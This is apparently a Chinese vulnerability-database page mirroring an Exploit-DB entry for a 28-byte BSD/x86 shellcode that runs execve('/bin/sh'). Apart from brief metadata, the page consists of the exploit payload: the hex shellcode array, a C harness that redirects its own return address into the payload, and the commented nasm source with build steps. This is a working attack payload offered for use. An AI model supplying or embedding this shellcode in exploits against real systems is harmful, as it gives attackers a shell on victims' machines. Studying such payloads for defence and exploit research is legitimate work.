BSD/x86 - execve(/bin/sh) Shellcode (28 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057128 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43645
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
simply	execve_binsh shellcode in 28 bytes
written on nasm - my first nasm exp.
greetz2:
	mig #darknet /EFnet.org
				dev0id #rus-sec /EFnet.org (rootteam.void.ru)
*/
char shellcode[] =
	"\xeb\x0e\x5e\x31\xc0\x88\x46\x07\x50\x50\x56\xb0\x3b\x50\xcd"
	"\x80\xe8\xed\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

void
main()
{
	int *ret;
	ret=(int*)&ret+2;
	(*ret)=(int)shellcode;
}

/****************************************
nasm code is:			        
---------------start--------------------
BITS	32			       
				
jmp short	path	
main:		
	pop	esi
	xor	eax,eax
	mov byte [esi+7],al
	push	eax
	push	eax
	push	esi
	mov	al,59
	push	eax
	int	0x80

	;mov	al,1   need ? I do not!
	;push	eax
	;int	0x80
path:
	call	main
	db	'/bin/sh'
---------------end----------------------
compilation:
	%nasm code.s -o code
****************************************/